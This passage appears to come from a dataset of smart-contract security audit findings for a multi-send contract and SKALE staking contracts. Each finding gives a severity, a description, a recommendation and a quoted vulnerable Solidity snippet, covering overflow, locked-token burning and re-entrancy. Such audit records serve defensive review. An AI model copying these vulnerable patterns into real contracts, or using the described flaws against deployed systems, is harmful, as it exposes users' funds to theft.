(bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; 
i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n\\nIt is also the only place where the `SafeMath` dependency is being used. More specifically to check there was no underflow in the arithmetic adding up the disbursed amounts.\\nHowever, since the individual sends would revert themselves should more Ether than what was available in the balance be specified these protection measures seem unnecessary.\\nNot only the above is true but the current codebase does not allow to take funds locked within the contract out in the off chance someone forced funds into this smart contract (e.g., by self-destructing some other smart contract containing funds into this one).чThe easiest way to handle both retiring `SafeMath` and returning locked funds would be to phase out all the intra-function arithmetic and just transferring `address(this).balance` to `msg.sender` at the end of the disbursement. 
Since all the funds in there are meant to be from the caller of the function this serves the purpose of returning extraneous funds to him well and, adding to that, it allows for some front-running fun if someone “self-destructed” funds to this smart contract by mistake.чч```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n -Unneeded type cast of contract typeчlowчThe typecast being done on the `address` parameter in the line below is unneeded.\\n```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\nчAssign the right type at the function parameter definition like so:\\n```\\n function sendErc20(ERC20 _tokenAddress, address[] memory _to, uint256[] memory _value) public restrictedToOwner returns (bool _success) {\\n```\\nчч```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\n -Inadequate use of assertчlowчThe usage of `require` vs `assert` has always been a matter of discussion because of the fine lines distinguishing these transaction-terminating expressions.\\nHowever, the usage of the `assert` syntax in this case is not the most appropriate.\\nBorrowing the explanation from the latest solidity docs (v. https://solidity.readthedocs.io/en/latest/control-structures.html#id4) :\\n```\\nThe assert function should only be used to test for internal errors, and to check invariants. 
\\n```\\n\\nSince assert-style exceptions (using the `0xfe` opcode) consume all gas available to the call and require-style ones (using the `0xfd` opcode) do not since the Metropolis release when the `REVERT` instruction was added, the usage of `require` in the lines depicted in the examples section would only result in gas savings and the same security assumptions.\\nIn this case, even though the calls are being made to external contracts that supposedly abide by a predefined specification, this is by no means an invariant of the presented system since the component is external to the built system and its integrity cannot be formally verified.\\n```\\nassert(\\_to[i].send(\\_value[i]));\\n```\\n\\n```\\nassert(msg.sender.send(remainingValue));\\n```\\n\\n```\\nassert(token.transferFrom(msg.sender, \\_to[i], \\_value[i]) == true);\\n```\\nчExchange the `assert` statements for `require` ones.чч```\\nThe assert function should only be used to test for internal errors, and to check invariants. \\n```\\n -uint overflow may lead to stealing fundsчhighчIt's possible to create a delegation with a very huge amount which may result in a lot of critically bad malicious usages:\\n```\\nuint holderBalance = SkaleToken(contractManager.getContract(\"SkaleToken\")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, \"Delegator hasn't enough tokens to delegate\");\\n```\\n\\n`amount` is passed by a user as a parameter, so if it's close to `uint` max value, `amount` + lockedToDelegate would overflow and this requirement would pass.\\nHaving delegation with an almost infinite amount of tokens can lead to many various attacks on the system up to stealing funds and breaking everything.чUsing `SafeMath` everywhere should prevent this and other similar issues. 
There could be more critical attacks caused by overflows/underflows, so `SafeMath` should be used everywhere in the codebase.чч```\\nuint holderBalance = SkaleToken(contractManager.getContract(\"SkaleToken\")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, \"Delegator hasn't enough tokens to delegate\");\\n```\\n -Holders can burn locked fundsчhighчSkale token is a modified ERC-777 that allows locking some part of the balance. Locking is checked during every transfer:\\n```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, \"Token should be unlocked for transferring\");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n\\nBut it's not checked during `burn` function and it's possible to “burn” `locked` tokens. Tokens will be burned, but `locked` amount will remain the same. 
That will result in having more `locked` tokens than the balance which may have very unpredictable behaviour.чAllow burning only unlocked tokens.чч```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, \"Token should be unlocked for transferring\");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n -Node can unlink validatorчhighчValidators can link a node address to them by calling `linkNodeAddress` function:\\n```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, \"Validator cannot override node address\");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, \"Validator hasn't permissions to unlink node\");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n\\nAfter that, the node has the same rights and is almost indistinguishable from the validator. So the node can even remove validator's address from `_validatorAddressToId` list and take over full control over validator. 
Additionally, the node can even remove itself by calling `unlinkNodeAddress`, leaving validator with no control at all forever.\\nAlso, even without nodes, a validator can initially call `unlinkNodeAddress` to remove itself.чLinked nodes (and validator) should not be able to unlink validator's address from the `_validatorAddressToId` mapping.чч```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, \"Validator cannot override node address\");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, \"Validator hasn't permissions to unlink node\");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n -Unlocking funds after slashingчhighчThe initial funds can be unlocked if 51+% of them are delegated. 
However if any portion of the funds are slashed, the rest of the funds will not be unlocked at the end of the delegation period.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\nчConsider slashed tokens as delegated, or include them in the calculation for process to unlock in `endingDelegatedToUnlocked`чч```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\n -Bounties and fees should only be locked for the first 3 monthsчhighчBounties are currently locked for the first 3 months after delegation:\\n```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n\\nInstead, they should be locked for the first 3 months after the token launch.чIt's better just to forbid any withdrawals for the first 3 months, no need to track it separately for every delegation. 
This recommendation is mainly to simplify the process.чч```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n -getLockedCount is iterating over all history of delegationsчhighч`getLockedCount` is iterating over all delegations of a specific holder and may even change the state of these delegations by calling `getState`.\\n```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n\\nThis problem is major because delegations number is growing over time and may even potentially grow more than the gas limit and lock all tokens forever. `getLockedCount` is called during every transfer which makes any token transfer much more expensive than it should be.чRemove iterations over a potentially unlimited amount of tokens. 
All the necessary data can be precalculated before and `getLockedCount` function can have O(1) complexity.чч```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n -Tokens are unlocked only when delegation endsчhighчAfter the first 3 months since at least 50% of tokens are delegated, all tokens should be unlocked. In practice, they are only unlocked if at least 50% of tokens, that were bought on the initial launch, are undelegated.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\nчImplement lock mechanism according to the legal requirement.чч```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n -Tokens after delegation should not be unlocked automaticallyчhighчWhen some amount of tokens are delegated to a validator when the delegation period ends, these tokens are unlocked. 
However these tokens should be added to `_purchased` as they were in that state before their delegation.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\nчTokens should only be unlocked if the main legal requirement `(_totalDelegated[holder] >= _purchased[holder])` is satisfied, which in the above case this has not happened.чч```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n -Some unlocked tokens can become locked after delegation is rejectedчhighчWhen some amount of tokens are requested to be delegated to a validator, the validator can reject the request. The previous status of these tokens should be intact and not changed (locked or unlocked).\\nHere the initial status of tokens gets stored and it's either completely `locked` or unlocked:\\n```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n\\nThe problem is that if some amount of these tokens are locked at the time of the request and the rest tokens are unlocked, they will all be considered as locked after the delegation was rejected.\\n```\\nfunction \\_cancel(uint delegationId, DelegationController.Delegation memory delegation) internal returns (State state) {\\n if (\\_isPurchased[delegationId]) {\\n state = purchasedProposedToPurchased(delegationId, delegation);\\n } else {\\n state = proposedToUnlocked(delegationId);\\n }\\n}\\n```\\nчDon't change the 
status of the rejected tokens.чч```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n -Gas limit for bounty and slashing distributionчhighчAfter every bounty payment (should be once per month) to a validator, the bounty is distributed to all delegators. In order to do that, there is a `for` loop that iterates over all active delegators and sends their bounty to `SkaleBalances` contract:\\n```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n\\nThere are also few more loops over all the active delegators. This leads to a huge gas cost of distribution mechanism. 
A number of active delegators that can be processed before hitting the gas limit is limited and not big enough.\\nThe same issue is with slashing:\\n```\\nfunction slash(uint validatorId, uint amount) external allow(\"SkaleDKG\") {\\n ValidatorService validatorService = ValidatorService(contractManager.getContract(\"ValidatorService\"));\\n require(validatorService.validatorExists(validatorId), \"Validator does not exist\");\\n\\n Distributor distributor = Distributor(contractManager.getContract(\"Distributor\"));\\n TokenState tokenState = TokenState(contractManager.getContract(\"TokenState\"));\\n\\n Distributor.Share[] memory shares = distributor.distributePenalties(validatorId, amount);\\n for (uint i = 0; i < shares.length; ++i) {\\n tokenState.slash(shares[i].delegationId, shares[i].amount);\\n }\\n}\\n```\\nчThe best solution would require major changes to the codebase, but would eventually make it simpler and safer. Instead of distributing and centrally calculating bounty for each delegator during one call it's better to just store all the necessary values, so delegator would be able to calculate the bounty on withdrawal. 
Amongst the necessary values, there should be history of total delegated amounts per validator during each bounty payment and history of all delegations with durations of their active state.чч```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n -Delegations might stuck in non-active validator PendingчmediumчIf a validator does not get enough funds to run a node (MSR - Minimum staking requirement), all token holders that delegated tokens to the validator cannot switch to a different validator, and might result in funds getting stuck with the nonfunctioning validator for up to 12 months.\\nExample\\n```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, \"Validator has to meet Minimum Staking Requirement\");\\n```\\nчResolution\\nSkale team acknowledged this issue and will address this in future versions.\\nAllow token holders to withdraw delegation earlier if the validator didn't get enough funds for running nodes.чч```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, \"Validator has to meet Minimum Staking Requirement\");\\n```\\n -Disabled Validators still have delegated funds PendingчmediumчThe owner of `ValidatorService` contract can enable and disable validators. 
The issue is that when a validator is disabled, it still has its delegations, and delegated funds will be locked until the end of their delegation period (up to 12 months).\\n```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\nчIt might make sense to release all delegations and stop validator's nodes if it's not trusted anymore. However, the rationale behind disabling the validators might be different that what we think, in any case there should be a way to handle this scenario, where the validator is disabled but there are funds delegated to it.чч```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\n -_endingDelegations list is redundantчmediumч`_endingDelegations` is a list of delegations that is created for optimisation purposes. 
But the only place it's used is in `getPurchasedAmount` function, so only a subset of all delegations is going to be updated.\\n```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n\\nBut `getPurchasedAmount` function is mostly used after iterating over all delegations of the holder.чResolution\\nIssue is fixed as a part of the major code changes in skalenetwork/skale-manager#92\\nRemove `_endingDelegations` and switch to a mechanism that does not require looping through delegations list of potentially unlimited size.чч```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n -Some functions are defined but not implementedчmediumчThere are many functions that are defined but not implemented. They have a revert with a message as not implemented.\\nThis results in complex code and reduces readability. Here is a some of these functions within the scope of this audit:\\n```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n```\\nчIf these functions are needed for this release, they must be implemented. 
If they are for future plan, it's better to remove the extra code in the smart contracts.чч```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n```\\n -tokenState.setState redundant checksчmediumч`tokenState.setState` is used to change the state of the token from:\\nPROPOSED to ACCEPTED (in accept())\\nDELEGATED to ENDING_DELEGATED (in `requestUndelegation()`\\nThe if/else statement in `setState` is too complicated and can be simplified, both to optimize gas usage and to increase readability.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(\"TimeHelpers\"));\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n\\n require(newState != State.PROPOSED, \"Can't set state to proposed\");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = getState(delegationId);\\n require(currentState == State.PROPOSED, \"Can't set state to accepted\");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(\"Can't set state to delegated\");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, \"Can't set state to ending delegated\");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(\"Unknown state\");\\n }\\n}\\n```\\nчSome of the 
changes that do not change the functionality of the `setState` function:\\nRemove `reverts()` and add the valid states to the `require()` at the beginning of the function\\nRemove multiple calls to `getState()`\\nRemove final else/revert as this is an internal function and States passed should be valid More optimization can be done which requires further understanding of the system and the state machine.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(\"TimeHelpers\"));\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n\\n require(newState != State.PROPOSED || newState != State.DELEGATED, \"Invalid state change\");\\n State currentState = getState(delegationId);\\n\\n if (newState == State.ACCEPTED) {\\n require(currentState == State.PROPOSED, \"Can't set state to accepted\");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(currentState == State.DELEGATED, \"Can't set state to ending delegated\");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n }\\n }\\n```\\nчч```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(\"TimeHelpers\"));\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n\\n require(newState != State.PROPOSED, \"Can't set state to proposed\");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = 
getState(delegationId);\\n require(currentState == State.PROPOSED, \"Can't set state to accepted\");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(\"Can't set state to delegated\");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, \"Can't set state to ending delegated\");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(\"Unknown state\");\\n }\\n}\\n```\\n -Users can burn delegated tokens using re-entrancy attackчhighчWhen a user burns tokens, the following code is called:\\n```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), \"Token should be unlocked for burning\");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n\\nThere is a callback function right after the check that there are enough unlocked tokens to burn. 
In this callback, the user can delegate all the tokens right before burning them without breaking the code flow.чResolution\\nMitigated in skalenetwork/skale-manager#128\\n`_callTokensToSend` should be called before checking for the unlocked amount of tokens, which is better defined as Checks-Effects-Interactions Pattern.чч```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), \"Token should be unlocked for burning\");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n -Rounding errors after slashingчhighчWhen slashing happens `_delegatedToValidator` and `_effectiveDelegatedToValidator` values are reduced.\\n```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n\\nWhen holders process slashings, they reduce `_delegatedByHolderToValidator`, `_delegatedByHolder`, `_effectiveDelegatedByHolderToValidator` values.\\n```\\nif (oldValue > 0) {\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n reduce(\\n \\_effectiveDelegatedByHolderToValidator[holder][validatorId],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n 
slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId, month));\\n}\\n```\\n\\nAlso when holders are undelegating, they are calculating how many tokens from `delegations[delegationId].amount` were slashed.\\n```\\nuint amountAfterSlashing = calculateDelegationAmountAfterSlashing(delegationId);\\n```\\n\\nAll these values should be calculated one from another, but they all will have different rounding errors after slashing. For example, the assumption that the total sum of all delegations from holder `X` to validator `Y` should still be equal to `_delegatedByHolderToValidator[X][Y]` is not true anymore. The problem is that these assumptions are still used. For example, when undelegating some delegation with delegated `amount` equals amount(after slashing), the holder will reduce `_delegatedByHolderToValidator[X][Y]`, `_delegatedByHolder[X]` and `_delegatedToValidator[Y]` by `amount`. Since rounding errors of all these values are different that will lead to 2 possible scenarios:\\nIf rounding error reduces `amount` not as much as other values, we can have `uint` underflow. This is especially dangerous because all calculations are delayed and we will know about underflow and `SafeMath` revert in the next month or later.\\nDevelopers already made sure that rounding errors are aligned in a correct way, and that the reduced value should always be larger than the subtracted, so there should not be underflow. This solution is very unstable because it's hard to verify it and keep in mind even during a small code change. 2. If rounding errors make `amount` smaller than it should be, when other values should be zero (for example, when all the delegations are undelegated), these values will become some very small values. 
The problem here is that it would be impossible to compare values to zero.чConsider not calling `revert` on these subtractions and make the result value equal to zero if underflow happens.\\nConsider comparing to some small `epsilon` value instead of zero. Or similar to the previous point, on every subtraction check if the value is smaller than `epsilon`, and make it zero if it is.чч```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n -Slashes do not affect bounty distributionчhighчWhen slashes are processed by a holder, only `_delegatedByHolderToValidator` and `_delegatedByHolder` values are reduced. But `_effectiveDelegatedByHolderToValidator` value remains the same. This value is used to distribute bounties amongst delegators. 
So slashing will not affect that distribution.\\n```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\nчReduce `_effectiveDelegatedByHolderToValidator` and `_effectiveDelegatedToValidator` when slashes are processed.чч```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\n -Storage operations optimizationчmediumчThere are a lot of operations that write some value to the storage (uses `SSTORE` opcode) without actually changing it.\\nIn `getAndUpdateValue` function of `DelegationController` and TokenLaunchLocker:\\n```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n\\nIn `handleSlash` function of `Punisher` contract `amount` will be zero in most cases:\\n```\\nfunction handleSlash(address holder, uint amount) external allow(\"DelegationController\") {\\n \\_locked[holder] = \\_locked[holder].add(amount);\\n}\\n```\\nчResolution\\nMitigated in skalenetwork/skale-manager#179\\nCheck if the value is the same and don't write 
it to the storage in that case.чч```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n -Function overloadingчlowчSome functions in the codebase are overloaded. That makes code less readable and increases the probability of missing bugs.\\nFor example, there are a lot of `reduce` function implementations in DelegationController:\\n```\\nfunction reduce(PartialDifferencesValue storage sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (hasSumSequence) {\\n 
